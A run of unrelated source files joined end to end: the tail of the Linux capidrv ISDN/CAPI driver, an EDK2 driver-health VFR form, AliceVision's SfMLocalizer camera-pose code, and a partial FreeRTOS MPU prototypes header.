return errcode == CAPI_SENDQUEUEFULL ? 0 : -1;
}
}
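/*
 * Return convention of if_sendbuf(): the full skb length on success, 0 to
 * make isdn4linux retry later (send queue full or no memory), -1 on a hard
 * error. Every failure path rolls back the ack entry added above so the
 * DATA_B3_CONF accounting stays consistent.
 */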
static int if_readstat(u8 __user *buf, int len, int id, int channel)
{
capidrv_contr *card = findcontrbydriverid(id);
int count;
u8 __user *p;
if (!card) {
printk(KERN_ERR "capidrv: if_readstat called with invalid driverId %d!\n",
id);
return -ENODEV;
}
for (p = buf, count = 0; count < len; p++, count++) {
if (put_user(*card->q931_read++, p))
return -EFAULT;
if (card->q931_read > card->q931_end)
card->q931_read = card->q931_buf;
}
return count;
}
static void enable_dchannel_trace(capidrv_contr *card)
{
u8 manufacturer[CAPI_MANUFACTURER_LEN];
capi_version version;
u16 contr = card->contrnr;
u16 errcode;
u16 avmversion[3];
errcode = capi20_get_manufacturer(contr, manufacturer);
if (errcode != CAPI_NOERROR) {
printk(KERN_ERR "%s: can't get manufacturer (0x%x)\n",
card->name, errcode);
return;
}
if (strstr(manufacturer, "AVM") == NULL) {
printk(KERN_ERR "%s: not from AVM, no d-channel trace possible (%s)\n",
card->name, manufacturer);
return;
}
errcode = capi20_get_version(contr, &version);
if (errcode != CAPI_NOERROR) {
printk(KERN_ERR "%s: can't get version (0x%x)\n",
card->name, errcode);
return;
}
avmversion[0] = (version.majormanuversion >> 4) & 0x0f;
avmversion[1] = (version.majormanuversion << 4) & 0xf0;
avmversion[1] |= (version.minormanuversion >> 4) & 0x0f;
avmversion[2] = version.minormanuversion & 0x0f; /* plain '=': avmversion[2] is otherwise uninitialized */
if (avmversion[0] > 3 || (avmversion[0] == 3 && avmversion[1] > 5)) {
printk(KERN_INFO "%s: D2 trace enabled\n", card->name);
capi_fill_MANUFACTURER_REQ(&cmdcmsg, global.ap.applid,
card->msgid++,
contr,
0x214D5641, /* ManuID */
0, /* Class */
1, /* Function */
(_cstruct)"\004\200\014\000\000");
} else {
printk(KERN_INFO "%s: D3 trace enabled\n", card->name);
capi_fill_MANUFACTURER_REQ(&cmdcmsg, global.ap.applid,
card->msgid++,
contr,
0x214D5641, /* ManuID */
0, /* Class */
1, /* Function */
(_cstruct)"\004\002\003\000\000");
}
send_message(card, &cmdcmsg);
}
static void send_listen(capidrv_contr *card)
{
capi_fill_LISTEN_REQ(&cmdcmsg, global.ap.applid,
card->msgid++,
card->contrnr, /* controller */
1 << 6, /* Infomask */
card->cipmask,
card->cipmask2,
NULL, NULL);
listen_change_state(card, EV_LISTEN_REQ);
send_message(card, &cmdcmsg);
}
static void listentimerfunc(unsigned long x)
{
capidrv_contr *card = (capidrv_contr *)x;
if (card->state != ST_LISTEN_NONE && card->state != ST_LISTEN_ACTIVE)
printk(KERN_ERR "%s: controller dead ??\n", card->name);
send_listen(card);
mod_timer(&card->listentimer, jiffies + 60 * HZ);
}
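/*
 * The listen timer doubles as a watchdog: every 60 seconds the LISTEN_REQ
 * is re-sent, and if the state machine is neither idle nor active by then,
 * the controller is presumed dead and a warning is logged.
 */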
static int capidrv_addcontr(u16 contr, struct capi_profile *profp)
{
capidrv_contr *card;
unsigned long flags;
isdn_ctrl cmd;
char id[20];
int i;
sprintf(id, "capidrv-%d", contr);
if (!try_module_get(THIS_MODULE)) {
printk(KERN_WARNING "capidrv: (%s) Could not reserve module\n", id);
return -1;
}
if (!(card = kzalloc(sizeof(capidrv_contr), GFP_ATOMIC))) {
printk(KERN_WARNING
"capidrv: (%s) Could not allocate contr-struct.\n", id);
return -1;
}
card->owner = THIS_MODULE;
init_timer(&card->listentimer);
strcpy(card->name, id);
card->contrnr = contr;
card->nbchan = profp->nbchannel;
card->bchans = kmalloc(sizeof(capidrv_bchan) * card->nbchan, GFP_ATOMIC);
if (!card->bchans) {
printk(KERN_WARNING
"capidrv: (%s) Could not allocate bchan-structs.\n", id);
module_put(card->owner);
kfree(card);
return -1;
}
card->interface.channels = profp->nbchannel;
card->interface.maxbufsize = 2048;
card->interface.command = if_command;
card->interface.writebuf_skb = if_sendbuf;
card->interface.writecmd = NULL;
card->interface.readstat = if_readstat;
card->interface.features = ISDN_FEATURE_L2_HDLC |
ISDN_FEATURE_L2_TRANS |
ISDN_FEATURE_L3_TRANS |
ISDN_FEATURE_P_UNKNOWN |
ISDN_FEATURE_L2_X75I |
ISDN_FEATURE_L2_X75UI |
ISDN_FEATURE_L2_X75BUI;
if (profp->support1 & (1 << 2))
card->interface.features |= ISDN_FEATURE_L2_V11096 |
ISDN_FEATURE_L2_V11019 |
ISDN_FEATURE_L2_V11038;
if (profp->support1 & (1 << 8))
card->interface.features |= ISDN_FEATURE_L2_MODEM;
card->interface.hl_hdrlen = 22; /* len of DATA_B3_REQ */
strncpy(card->interface.id, id, sizeof(card->interface.id) - 1);
card->q931_read = card->q931_buf;
card->q931_write = card->q931_buf;
card->q931_end = card->q931_buf + sizeof(card->q931_buf) - 1;
if (!register_isdn(&card->interface)) {
printk(KERN_ERR "capidrv: Unable to register contr %s\n", id);
kfree(card->bchans);
module_put(card->owner);
kfree(card);
return -1;
}
card->myid = card->interface.channels;
memset(card->bchans, 0, sizeof(capidrv_bchan) * card->nbchan);
for (i = 0; i < card->nbchan; i++) {
card->bchans[i].contr = card;
}
spin_lock_irqsave(&global_lock, flags);
card->next = global.contr_list;
global.contr_list = card;
global.ncontr++;
spin_unlock_irqrestore(&global_lock, flags);
cmd.command = ISDN_STAT_RUN;
cmd.driver = card->myid;
card->interface.statcallb(&cmd);
card->cipmask = 0x1FFF03FF; /* any */
card->cipmask2 = 0;
card->listentimer.data = (unsigned long)card;
card->listentimer.function = listentimerfunc;
send_listen(card);
mod_timer(&card->listentimer, jiffies + 60 * HZ);
printk(KERN_INFO "%s: now up (%d B channels)\n",
card->name, card->nbchan);
enable_dchannel_trace(card);
return 0;
}
static int capidrv_delcontr(u16 contr)
{
capidrv_contr **pp, *card;
unsigned long flags;
isdn_ctrl cmd;
spin_lock_irqsave(&global_lock, flags);
for (card = global.contr_list; card; card = card->next) {
if (card->contrnr == contr)
break;
}
if (!card) {
spin_unlock_irqrestore(&global_lock, flags);
printk(KERN_ERR "capidrv: delcontr: no contr %u\n", contr);
return -1;
}
/* FIXME: possible race condition; the card should be removed
 * from the global list here /kkeil
 */
spin_unlock_irqrestore(&global_lock, flags);
del_timer(&card->listentimer);
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: id=%d unloading\n",
card->contrnr, card->myid);
cmd.command = ISDN_STAT_STOP;
cmd.driver = card->myid;
card->interface.statcallb(&cmd);
while (card->nbchan) {
cmd.command = ISDN_STAT_DISCH;
cmd.driver = card->myid;
cmd.arg = card->nbchan - 1;
cmd.parm.num[0] = 0;
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: id=%d disable chan=%ld\n",
card->contrnr, card->myid, cmd.arg);
card->interface.statcallb(&cmd);
if (card->bchans[card->nbchan - 1].nccip)
free_ncci(card, card->bchans[card->nbchan - 1].nccip);
if (card->bchans[card->nbchan - 1].plcip)
free_plci(card, card->bchans[card->nbchan - 1].plcip);
if (card->plci_list)
printk(KERN_ERR "capidrv: bug in free_plci()\n");
card->nbchan--;
}
kfree(card->bchans);
card->bchans = NULL;
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: id=%d isdn unload\n",
card->contrnr, card->myid);
cmd.command = ISDN_STAT_UNLOAD;
cmd.driver = card->myid;
card->interface.statcallb(&cmd);
if (debugmode)
printk(KERN_DEBUG "capidrv-%d: id=%d remove contr from list\n",
card->contrnr, card->myid);
spin_lock_irqsave(&global_lock, flags);
for (pp = &global.contr_list; *pp; pp = &(*pp)->next) {
if (*pp == card) {
*pp = (*pp)->next;
card->next = NULL;
global.ncontr--;
break;
}
}
spin_unlock_irqrestore(&global_lock, flags);
module_put(card->owner);
printk(KERN_INFO "%s: now down.\n", card->name);
kfree(card);
return 0;
}
static int
lower_callback(struct notifier_block *nb, unsigned long val, void *v)
{
capi_profile profile;
u32 contr = (long)v;
switch (val) {
case CAPICTR_UP:
printk(KERN_INFO "capidrv: controller %hu up\n", contr);
if (capi20_get_profile(contr, &profile) == CAPI_NOERROR)
(void) capidrv_addcontr(contr, &profile);
break;
case CAPICTR_DOWN:
printk(KERN_INFO "capidrv: controller %hu down\n", contr);
(void) capidrv_delcontr(contr);
break;
}
return NOTIFY_OK;
}
/*
* /proc/capi/capidrv:
* nrecvctlpkt nrecvdatapkt nsendctlpkt nsenddatapkt
*/
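/* e.g. "0 0 0 0" right after the module is loaded; all four counters
 * are cumulative and only ever grow */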
static int capidrv_proc_show(struct seq_file *m, void *v)
{
seq_printf(m, "%lu %lu %lu %lu\n",
global.ap.nrecvctlpkt,
global.ap.nrecvdatapkt,
global.ap.nsentctlpkt,
global.ap.nsentdatapkt);
return 0;
}
static int capidrv_proc_open(struct inode *inode, struct file *file)
{
return single_open(file, capidrv_proc_show, NULL);
}
static const struct file_operations capidrv_proc_fops = {
.owner = THIS_MODULE,
.open = capidrv_proc_open,
.read = seq_read,
.llseek = seq_lseek,
.release = single_release,
};
static void __init proc_init(void)
{
proc_create("capi/capidrv", 0, NULL, &capidrv_proc_fops);
}
static void __exit proc_exit(void)
{
remove_proc_entry("capi/capidrv", NULL);
}
static struct notifier_block capictr_nb = {
.notifier_call = lower_callback,
};
static int __init capidrv_init(void)
{
capi_profile profile;
u32 ncontr, contr;
u16 errcode;
global.ap.rparam.level3cnt = -2; /* number of bchannels twice */
global.ap.rparam.datablkcnt = 16;
global.ap.rparam.datablklen = 2048;
global.ap.recv_message = capidrv_recv_message;
errcode = capi20_register(&global.ap);
if (errcode) {
return -EIO;
}
register_capictr_notifier(&capictr_nb);
errcode = capi20_get_profile(0, &profile);
if (errcode != CAPI_NOERROR) {
unregister_capictr_notifier(&capictr_nb);
capi20_release(&global.ap);
return -EIO;
}
ncontr = profile.ncontroller;
for (contr = 1; contr <= ncontr; contr++) {
errcode = capi20_get_profile(contr, &profile);
if (errcode != CAPI_NOERROR)
continue;
(void) capidrv_addcontr(contr, &profile);
}
proc_init();
return 0;
}
static void __exit capidrv_exit(void)
{
unregister_capictr_notifier(&capictr_nb);
capi20_release(&global.ap);
proc_exit();
}
module_init(capidrv_init);
module_exit(capidrv_exit);
///** @file
//
// VFR to produce the formset used by BDS. This form only lists
// the Configure Required driver health instances.
//
// Copyright (c) 2013 - 2015, Intel Corporation. All rights reserved.<BR>
// SPDX-License-Identifier: BSD-2-Clause-Patent
//**/
#include "DriverHealthManagerVfr.h"
formset
guid = DRIVER_HEALTH_CONFIGURE_FORMSET_GUID,
title = STRING_TOKEN(STR_FORM_TITLE),
help = STRING_TOKEN(STR_FORM_HELP),
classguid = DRIVER_HEALTH_CONFIGURE_FORMSET_GUID,
form formid = DRIVER_HEALTH_FORM_ID,
title = STRING_TOKEN(STR_FORM_TITLE);
label LABEL_BEGIN;
label LABEL_END;
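//
// LABEL_BEGIN/LABEL_END bracket the spot where the driver health manager
// inserts one entry per "configure required" driver at runtime; the
// suppressed text question below presumably only exists so the form can
// receive refresh events for QUESTION_ID_REFRESH_CONFIGURE.
//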
suppressif TRUE;
text
help = STRING_TOKEN(STR_NULL),
text = STRING_TOKEN(STR_NULL),
flags = INTERACTIVE,
key = QUESTION_ID_REFRESH_CONFIGURE;
endif;
endform;
endformset;
// This file is part of the AliceVision project.
// Copyright (c) 2016 AliceVision contributors.
// Copyright (c) 2012 openMVG contributors.
// This Source Code Form is subject to the terms of the Mozilla Public License,
// v. 2.0. If a copy of the MPL was not distributed with this file,
// You can obtain one at https://mozilla.org/MPL/2.0/.
#include "SfMLocalizer.hpp"
#include <aliceVision/config.hpp>
#include <aliceVision/sfm/BundleAdjustmentCeres.hpp>
#include <aliceVision/sfm/BundleAdjustmentSymbolicCeres.hpp>
#include <aliceVision/robustEstimation/ACRansac.hpp>
#include <aliceVision/robustEstimation/LORansac.hpp>
#include <aliceVision/robustEstimation/ScoreEvaluator.hpp>
#include <aliceVision/matching/supportEstimation.hpp>
#include <aliceVision/multiview/resection/P3PSolver.hpp>
#include <aliceVision/multiview/resection/ResectionKernel.hpp>
#include <aliceVision/multiview/resection/Resection6PSolver.hpp>
#include <aliceVision/multiview/resection/ProjectionDistanceError.hpp>
#include <aliceVision/multiview/Unnormalizer.hpp>
#include <aliceVision/multiview/ResectionKernel.hpp>
namespace aliceVision {
namespace sfm {
bool SfMLocalizer::Localize(const Pair& imageSize,
const camera::IntrinsicBase* optionalIntrinsics,
ImageLocalizerMatchData& resectionData,
geometry::Pose3& pose,
robustEstimation::ERobustEstimator estimator)
{
// compute the camera pose (resectioning)
Mat34 P;
resectionData.vec_inliers.clear();
// setup the admissible upper bound residual error
const double precision =
resectionData.error_max == std::numeric_limits<double>::infinity() ?
std::numeric_limits<double>::infinity() :
Square(resectionData.error_max);
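// (AC-RANSAC works on squared residuals, hence Square(error_max) above)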
std::size_t minimumSamples = 0;
const camera::Pinhole* pinholeCam = dynamic_cast<const camera::Pinhole*>(optionalIntrinsics);
if(pinholeCam == nullptr || !pinholeCam->isValid())
{
// classic resection (try to compute the entire P matrix)
using SolverT = multiview::resection::Resection6PSolver;
using KernelT = multiview::ResectionKernel<SolverT, multiview::resection::ProjectionDistanceSquaredError, multiview::UnnormalizerResection, robustEstimation::Mat34Model>;
const KernelT kernel(resectionData.pt2D, resectionData.pt3D, imageSize.first, imageSize.second);
minimumSamples = kernel.getMinimumNbRequiredSamples();
// robust estimation of the Projection matrix and its precision
robustEstimation::Mat34Model model;
const std::pair<double,double> ACRansacOut = robustEstimation::ACRANSAC(kernel, resectionData.vec_inliers, resectionData.max_iteration, &model, precision);
P = model.getMatrix();
// update the upper bound precision of the model found by AC-RANSAC
resectionData.error_max = ACRansacOut.first;
}
else
{
// undistort the points if the camera has a distortion model
Mat pt2Dundistorted;
const bool hasDistortion = pinholeCam->hasDistortion();
if(hasDistortion)
{
const std::size_t numPts = resectionData.pt2D.cols();
pt2Dundistorted = Mat2X(2, numPts);
for(std::size_t iPoint = 0; iPoint < numPts; ++iPoint)
{
pt2Dundistorted.col(iPoint) = pinholeCam->get_ud_pixel(resectionData.pt2D.col(iPoint));
}
}
switch(estimator)
{
case robustEstimation::ERobustEstimator::ACRANSAC:
{
// since K calibration matrix is known, compute only [R|t]
using SolverT = multiview::resection::P3PSolver;
using KernelT = multiview::ResectionKernel_K<SolverT, multiview::resection::ProjectionDistanceSquaredError, multiview::UnnormalizerResection, robustEstimation::Mat34Model>;
// otherwise we just pass the input points
const KernelT kernel = KernelT(hasDistortion ? pt2Dundistorted : resectionData.pt2D, resectionData.pt3D, pinholeCam->K());
minimumSamples = kernel.getMinimumNbRequiredSamples();
// robust estimation of the Projection matrix and its precision
robustEstimation::Mat34Model model;
const std::pair<double, double> ACRansacOut = robustEstimation::ACRANSAC(kernel, resectionData.vec_inliers, resectionData.max_iteration, &model, precision);
P = model.getMatrix();
// update the upper bound precision of the model found by AC-RANSAC
resectionData.error_max = ACRansacOut.first;
break;
}
case robustEstimation::ERobustEstimator::LORANSAC:
{
// just a safeguard
if(resectionData.error_max == std::numeric_limits<double>::infinity())
{
// switch to a default value
resectionData.error_max = 4.0;
ALICEVISION_LOG_DEBUG("LORansac: error was set to infinity, a default value of "
<< resectionData.error_max << " is going to be used");
}
// use the P3P solver for generating the model
using SolverT = multiview::resection::P3PSolver;
using SolverLsT = multiview::resection::Resection6PSolver;
// use the six point algorithm as Least square solution to refine the model
using KernelT = multiview::ResectionKernel_K<SolverT, multiview::resection::ProjectionDistanceSquaredError, multiview::UnnormalizerResection, robustEstimation::Mat34Model, SolverLsT>;
// otherwise we just pass the input points
const KernelT kernel = KernelT(hasDistortion ? pt2Dundistorted : resectionData.pt2D, resectionData.pt3D, pinholeCam->K());
minimumSamples = kernel.getMinimumNbRequiredSamples();
// FIXME: the threshold should always be given as a pixel value; the
// scorer should not need to know that the kernel works on squared,
// normalized errors. For now we square error_max and apply the kernel's
// normalizer so the comparison happens in the kernel's own domain.
// @todo refactor, maybe move scorer directly inside the kernel
const double threshold = resectionData.error_max * resectionData.error_max * (kernel.normalizer2()(0, 0) * kernel.normalizer2()(0, 0));
robustEstimation::ScoreEvaluator<KernelT> scorer(threshold);
const robustEstimation::Mat34Model model = robustEstimation::LO_RANSAC(kernel, scorer, &resectionData.vec_inliers);
P = model.getMatrix();
break;
}
default:
throw std::runtime_error("[SfMLocalizer::localize] Only ACRansac and LORansac are supported!");
}
}
const bool resection = matching::hasStrongSupport(resectionData.vec_inliers, resectionData.vec_descType, minimumSamples);
if(!resection)
{
ALICEVISION_LOG_DEBUG("Resection status is false:\n"
"\t- resection_data.vec_inliers.size() = " << resectionData.vec_inliers.size() << "\n"
"\t- minimumSamples = " << minimumSamples);
}
if(resection)
{
resectionData.projection_matrix = P;
Mat3 K, R;
Vec3 t;
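// P = K * [R | t]; the camera center is C = -R^T * t, which is what
// Pose3 stores together with the rotation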
KRt_from_P(P, &K, &R, &t);
pose = geometry::Pose3(R, -R.transpose() * t);
}
ALICEVISION_LOG_INFO("Robust Resection information:\n"
"\t- resection status: " << resection << "\n"
"\t- threshold (error max): " << resectionData.error_max << "\n"
"\t- # points used for resection: " << resectionData.pt2D.cols() << "\n"
"\t- # points validated by robust resection: " << resectionData.vec_inliers.size());
return resection;
}
bool SfMLocalizer::RefinePose(camera::IntrinsicBase* intrinsics,
geometry::Pose3& pose,
const ImageLocalizerMatchData& matchingData,
bool refinePose,
bool refineIntrinsic)
{
// Setup a tiny SfM scene with the corresponding 2D-3D data
sfmData::SfMData tinyScene;
// view
std::shared_ptr<sfmData::View> view = std::make_shared<sfmData::View>("", 0, 0, 0);
tinyScene.views.insert(std::make_pair(0, view));
// pose
tinyScene.setPose(*view, sfmData::CameraPose(pose));
// intrinsic: work on a clone so the caller's intrinsics object is only
// modified on success (see the assign() below)
std::shared_ptr<camera::IntrinsicBase> localIntrinsics(intrinsics->clone());
tinyScene.intrinsics[0] = localIntrinsics;
const double unknownScale = 0.0;
// structure data (2D-3D correspondences)
for(std::size_t i = 0; i < matchingData.vec_inliers.size(); ++i)
{
const std::size_t idx = matchingData.vec_inliers[i];
sfmData::Landmark landmark;
landmark.X = matchingData.pt3D.col(idx);
landmark.observations[0] = sfmData::Observation(matchingData.pt2D.col(idx), UndefinedIndexT, unknownScale); // TODO-SCALE
tinyScene.structure[i] = std::move(landmark);
}
BundleAdjustmentCeres BA;
BundleAdjustment::ERefineOptions refineOptions = BundleAdjustment::REFINE_NONE;
if(refinePose)
refineOptions |= BundleAdjustment::REFINE_ROTATION | BundleAdjustment::REFINE_TRANSLATION;
if(refineIntrinsic)
refineOptions |= BundleAdjustment::REFINE_INTRINSICS_ALL;
const bool success = BA.adjust(tinyScene, refineOptions);
if(!success)
return false;
pose = tinyScene.getPose(*view).getTransform();
if(refineIntrinsic)
intrinsics->assign(*localIntrinsics);
return true;
}
} // namespace sfm
} // namespace aliceVision
/*
FreeRTOS V9.0.0 - Copyright (C) 2016 Real Time Engineers Ltd.
All rights reserved
VISIT http://www.FreeRTOS.org TO ENSURE YOU ARE USING THE LATEST VERSION.
This file is part of the FreeRTOS distribution.
FreeRTOS is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License (version 2) as published by the
Free Software Foundation >>>> AND MODIFIED BY <<<< the FreeRTOS exception.
***************************************************************************
>>! NOTE: The modification to the GPL is included to allow you to !<<
>>! distribute a combined work that includes FreeRTOS without being !<<
>>! obliged to provide the source code for proprietary components !<<
>>! outside of the FreeRTOS kernel. !<<
***************************************************************************
FreeRTOS is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. Full license text is available on the following
link: http://www.freertos.org/a00114.html
***************************************************************************
* *
* FreeRTOS provides completely free yet professionally developed, *
* robust, strictly quality controlled, supported, and cross *
* platform software that is more than just the market leader, it *
* is the industry's de facto standard. *
* *
* Help yourself get started quickly while simultaneously helping *
* to support the FreeRTOS project by purchasing a FreeRTOS *
* tutorial book, reference manual, or both: *
* http://www.FreeRTOS.org/Documentation *
* *
***************************************************************************
http://www.FreeRTOS.org/FAQHelp.html - Having a problem? Start by reading
the FAQ page "My application does not run, what could be wrong?". Have you
defined configASSERT()?
http://www.FreeRTOS.org/support - In return for receiving this top quality
embedded software for free we request you assist our global community by
participating in the support forum.
http://www.FreeRTOS.org/training - Investing in training allows your team to
be as productive as possible as early as possible. Now you can receive
FreeRTOS training directly from Richard Barry, CEO of Real Time Engineers
Ltd, and the world's leading authority on the world's leading RTOS.
http://www.FreeRTOS.org/plus - A selection of FreeRTOS ecosystem products,
including FreeRTOS+Trace - an indispensable productivity tool, a DOS
compatible FAT file system, and our tiny thread aware UDP/IP stack.
http://www.FreeRTOS.org/labs - Where new FreeRTOS products go to incubate.
Come and try FreeRTOS+TCP, our new open source TCP/IP stack for FreeRTOS.
http://www.OpenRTOS.com - Real Time Engineers ltd. license FreeRTOS to High
Integrity Systems ltd. to sell under the OpenRTOS brand. Low cost OpenRTOS
licenses offer ticketed support, indemnification and commercial middleware.
http://www.SafeRTOS.com - High Integrity Systems also provide a safety
engineered and independently SIL3 certified version for use in safety and
mission critical applications that require provable dependability.
1 tab == 4 spaces!
*/
/*
* When the MPU is used the standard (non MPU) API functions are mapped to
* equivalents that start "MPU_", the prototypes for which are defined in this
* header file. This will cause the application code to call the MPU_ version,
* which wraps the non-MPU version with privilege promoting then demoting code,
* so the kernel code always runs with full privileges.
*/
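/*
 * Illustrative sketch only (not part of the original header): each MPU_
 * wrapper typically raises the privilege level, calls the real API
 * function, then restores the caller's original privilege level:
 *
 *    void MPU_vTaskDelay( const TickType_t xTicksToDelay )
 *    {
 *        BaseType_t xRunningPrivileged = xPortRaisePrivilege();
 *
 *        vTaskDelay( xTicksToDelay );
 *
 *        vPortResetPrivilege( xRunningPrivileged );
 *    }
 *
 * The real wrappers live in mpu_wrappers.c; the exact raise/reset
 * primitives are port-specific.
 */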
#ifndef MPU_PROTOTYPES_H
#define MPU_PROTOTYPES_H
/* MPU versions of tasks.h API function. */
BaseType_t MPU_xTaskCreate( TaskFunction_t pxTaskCode, const char * const pcName, const uint16_t usStackDepth, void * const pvParameters, UBaseType_t uxPriority, TaskHandle_t * const pxCreatedTask );
TaskHandle_t MPU_xTaskCreateStatic( TaskFunction_t pxTaskCode, const char * const pcName, const uint32_t ulStackDepth, void * const pvParameters, UBaseType_t uxPriority, StackType_t * const puxStackBuffer, StaticTask_t * const pxTaskBuffer );
BaseType_t MPU_xTaskCreateRestricted( const TaskParameters_t * const pxTaskDefinition, TaskHandle_t *pxCreatedTask );
void MPU_vTaskAllocateMPURegions( TaskHandle_t xTask, const MemoryRegion_t * const pxRegions );
void MPU_vTaskDelete( TaskHandle_t xTaskToDelete );
void MPU_vTaskDelay( const TickType_t xTicksToDelay );
void MPU_vTaskDelayUntil( TickType_t * const pxPreviousWakeTime, const TickType_t xTimeIncrement );
BaseType_t MPU_xTaskAbortDelay( TaskHandle_t xTask );
UBaseType_t MPU_uxTaskPriorityGet( TaskHandle_t xTask );
eTaskState MPU_eTaskGetState( TaskHandle_t xTask );
void MPU_vTaskGetInfo( TaskHandle_t xTask, TaskStatus_t *pxTaskStatus, BaseType_t xGetFreeStackSpace, eTaskState eState );
void MPU_vTaskPrioritySet( TaskHandle_t xTask, UBaseType_t uxNewPriority );
void MPU_vTaskSuspend( TaskHandle_t xTaskToSuspend );
void MPU_vTaskResume( TaskHandle_t xTaskToResume );
void MPU_vTaskStartScheduler( void );
void MPU_vTaskSuspendAll( void );
BaseType_t MPU_xTaskResumeAll( void );
TickType_t MPU_xTaskGetTickCount( void );
UBaseType_t MPU_uxTaskGetNumberOfTasks( void );
char * MPU_pcTaskGetName( TaskHandle_t xTaskToQuery );
TaskHandle_t MPU_xTaskGetHandle( const char *pcNameToQuery );
UBaseType_t MPU_uxTaskGetStackHighWaterMark( TaskHandle_t xTask );
void MPU_vTaskSetApplicationTaskTag( TaskHandle_t xTask, TaskHookFunction_t pxHookFunction );
TaskHookFunction_t MPU_xTaskGetApplicationTaskTag( TaskHandle_t xTask );
void MPU_vTaskSetThreadLocalStoragePointer( TaskHandle_t xTaskToSet, BaseType_t xIndex, void *pvValue );
void * MPU_pvTaskGetThreadLocalStoragePointer( TaskHandle_t xTaskToQuery, BaseType_t xIndex );
BaseType_t MPU_xTaskCallApplicationTaskHook( TaskHandle_t xTask, void *pvParameter );
TaskHandle_t MPU_xTaskGetIdleTaskHandle( void );
UBaseType_t MPU_uxTaskGetSystemState( TaskStatus_t * const pxTaskStatusArray, const UBaseType_t uxArraySize, uint32_t * const pulTotalRunTime );
void MPU_vTaskList( char * pcWriteBuffer );
void MPU_vTaskGetRunTimeStats( char *pcWriteBuffer );
BaseType_t MPU_xTaskGenericNotify( TaskHandle_t xTaskToNotify, uint32_t ulValue, eNotifyAction eAction, uint32_t *pulPreviousNotificationValue );
BaseType_t MPU_xTaskNotifyWait( uint32_t ulBitsToClearOnEntry, uint32_t ulBitsToClearOnExit, uint32_t *pulNotificationValue, TickType_t xTicksToWait );
uint32_t MPU_ulTaskNotifyTake( BaseType_t xClearCountOnExit, TickType_t xTicksToWait );
BaseType_t MPU_xTaskNotifyStateClear( TaskHandle_t xTask );
BaseType_t MPU_xTaskIncrementTick( void );
TaskHandle_t MPU_xTaskGetCurrentTaskHandle( void );
void MPU_vTaskSetTimeOutState( TimeOut_t * const pxTimeOut );
BaseType_t MPU_xTaskCheckForTimeOut( TimeOut_t * const pxTimeOut, TickType_t * const pxTicksToWait );
void MPU_vTaskMissedYield( void );
BaseType_t MPU_xTaskGetSchedulerState( void );
/* MPU versions of queue.h API function. */
BaseType_t MPU_xQueueGenericSend( QueueHandle_t xQueue, const void * const pvItemToQueue, TickType_t xTicksToWait, const BaseType_t xCopyPosition );
BaseType_t MPU_xQueueGenericReceive( QueueHandle_t xQueue, void * const pvBuffer, TickType_t xTicksToWait, const BaseType_t xJustPeek );
UBaseType_t MPU_uxQueueMessagesWaiting( const QueueHandle_t xQueue );
UBaseType_t MPU_uxQueueSpacesAvailable( const QueueHandle_t xQueue );
void MPU_vQueueDelete( QueueHandle_t xQueue );
QueueHandle_t MPU_xQueueCreateMutex( const uint8_t ucQueueType );
QueueHandle_t MPU_xQueueCreateMutexStatic( const uint8_t ucQueueType, StaticQueue_t *pxStaticQueue );
QueueHandle_t MPU_xQueueCreateCountingSemaphore( const UBaseType_t uxMaxCount, const UBaseType_t uxInitialCount );
QueueHandle_t MPU_xQueueCreateCountingSemaphoreStatic( const UBaseType_t uxMaxCount, const UBaseType_t uxInitialCount, StaticQueue_t *pxStaticQueue );
void* MPU_xQueueGetMutexHolder( QueueHandle_t xSemaphore );
BaseType_t MPU_xQueueTakeMutexRecursive( QueueHandle_t xMutex, TickType_t xTicksToWait );
BaseType_t MPU_xQueueGiveMutexRecursive( QueueHandle_t pxMutex );
void MPU_vQueueAddToRegistry( QueueHandle_t xQueue, const char *pcName );
void MPU_vQueueUnregisterQueue( QueueHandle_t xQueue );
const char * MPU_pcQueueGetName( QueueHandle_t xQueue );
QueueHandle_t MPU_xQueueGenericCreate( const UBaseType_t uxQueueLength, const UBaseType_t uxItemSize, const uint8_t ucQueueType );
QueueHandle_t MPU_xQueueGenericCreateStatic( const UBaseType_t uxQueueLength, const UBaseType_t uxItemSize, uint8_t *pucQueueStorage, StaticQueue_t *pxStaticQueue, const uint8_t ucQueueType );
QueueSetHandle_t MPU_xQueueCreateSet( const UBaseType_t uxEventQueueLength );
BaseType_t MPU_xQueueAddToSet( QueueSetMemberHandle_t xQueueOrSemaphore, QueueSetHandle_t xQueueSet );
BaseType_t MPU_xQueueRemoveFromSet( QueueSetMemberHandle_t xQueueOrSemaphore, QueueSetHandle_t xQueueSet );
QueueSetMemberHandle_t MPU_xQueueSelectFromSet( QueueSetHandle_t xQueueSet, const TickType_t xTicksToWait );
BaseType_t MPU_xQueueGenericReset( QueueHandle_t xQueue, BaseType_t xNewQueue );
void MPU_vQueueSetQueueNumber( QueueHandle_t xQueue, UBaseType_t uxQueueNumber );
UBaseType_t MPU_uxQueueGetQueueNumber( QueueHandle_t xQueue );
uint8_t MPU_ucQueueGetQueueType( QueueHandle_t xQueue );
/* MPU versions of timers.h API function. */
TimerHandle_t MPU_xTimerCreate( const char * const pcTimerName, const TickType_t xTimerPeriodInTicks, const UBaseType_t uxAutoReload, void * const pvTimerID, TimerCallbackFunction_t pxCallbackFunction );
TimerHandle_t MPU_xTimerCreateStatic( const char * const pcTimerName, const TickType_t xTimerPeriodInTicks, const UBaseType_t uxAutoReload, void * const pvTimerID, TimerCallbackFunction_t pxCallbackFunction, StaticTimer_t *pxTimerBuffer );
void * MPU_pvTimerGetTimerID( const TimerHandle_t xTimer );
void MPU_vTimerSetTimerID( TimerHandle_t xTimer, void *pvNewID );
BaseType_t MPU_xTimerIsTimerActive( TimerHandle_t xTimer );
TaskHandle_t MPU_xTimerGetTimerDaemonTaskHandle( void );
BaseType_t MPU_xTimerPendFunctionCall( PendedFunction_t xFunctionToPend, void *pvParameter1, uint32_t ulParameter2, TickType_t xTicksToWait );
const char * MPU_pcTimerGetName( TimerHandle_t xTimer );
TickType_t MPU_xTimerGetPeriod( TimerHandle_t xTimer );
TickType_t MPU_xTimerGetExpiryTime( TimerHandle_t xTimer );
BaseType_t MPU_xTimerCreateTimerTask( void );
BaseType_t MPU_xTimerGenericCommand( TimerHandle_t xTimer, const BaseType_t xCommandID, const TickType_t xOptionalValue, BaseType_t * const pxHigherPriorityTaskWoken, const TickType_t xTicksToWait );
/* MPU versions of event_group.h API function. */
